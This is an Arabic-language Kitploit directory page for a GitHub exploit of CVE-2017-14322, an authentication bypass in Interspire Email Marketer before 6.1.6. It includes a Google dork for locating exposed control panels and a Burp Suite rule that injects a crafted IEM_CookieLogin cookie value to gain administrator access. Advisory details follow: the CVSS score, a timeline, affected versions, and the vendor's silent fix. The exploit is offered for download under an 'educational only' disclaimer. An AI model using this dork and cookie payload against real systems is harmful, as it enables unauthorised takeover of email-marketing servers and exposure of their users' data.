Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-14322 — CVE-2017-14322 استغلال Interspire Email Marketer (emailmarketer) | Kitploit
أدوات/GitHubGitHub/joesmithjaffa/cve-2017-14322
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubjoesmithjaffa/cve-2017-14322

CVE-2017-14322

CVE-2017-14322 استغلال Interspire Email Marketer (emailmarketer)

عرض المستودع
518منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إكسبلويت CVE-2017-14322 لـ Interspire Email Marketer (emailmarketer)

جوجل دورك

intitle:"Control Panel" + emailmarketer

الإكسبلويت باستخدام Burp Suite

أضف قاعدة "Match and Replace" لرأس الطلب (Request header) كما يلي:

Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo4OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D

عند فتح الموقع، لن يعمل في المرة الأولى لأن رأس Cookie غير موجود. قم بتحديث الموقع للمرة الثانية باستخدام وكيل Burp مع القاعدة المذكورة أعلاه، وسترى ما تريده. تأكد من تفعيل "Intercept Client Requests".

العنوان:

Interspire Email Marketer - تجاوز مصادقة المسؤول عن بُعد

المؤلف:

Hakan Küsne, Infoteam Security (CH)

معرف CVE:

CVE-2017-14322

معلومات المخاطرة:

درجة القاعدة الأساسية CVSS: 9.8 متجه CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

الجدول الزمني:

2017-09-12 اكتشاف الثغرة 2017-09-12 اكتشف أن البائع قد أصلحها بالفعل لكنه لم يخطر العملاء مطلقًا، مما ترك المئات عرضة للخطر 2017-10-17 الإفصاح العام

المنتجات المتأثرة:

Interspire Email Marketer قبل الإصدار 6.1.6

الصفحة الرئيسية للبائع:

http://www.interspire.com/emailmarketer/

التفاصيل:

الدالة المسؤولة عن التحقق مما إذا كان المستخدم قد سجل الدخول بالفعل في init.php ضمن Interspire Email Marketer (IEM) قبل الإصدار 6.1.6 تسمح للمهاجمين عن بُعد بتجاوز المصادقة والحصول على وصول إداري باستخدام ملف تعريف الارتباط IEM_CookieLogin بقيمة مصممة خصيصًا. علاوة على ذلك، إذا لم يكن لدى العميل خطة صيانة سنوية، يقول التطبيق إنه على الإصدار الأخير المتاح ولا يوجد تحديث.

تم العثور على الثغرات أثناء الاستجابة لحادث على نسخة مخترقة من التطبيق.

إثبات المفهوم:

التفاصيل مقدمة هنا: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

الإصلاح:

قام البائع بتصحيح الثغرة في الإصدار 6.1.6، لكنه لم يخطر عملاءه بذلك تحديدًا أبدًا.

ملاحظة:

هذا الإكسبلويت لأغراض تعليمية فقط وليس مسؤولاً عن أفعالك.

تنزيل الأداة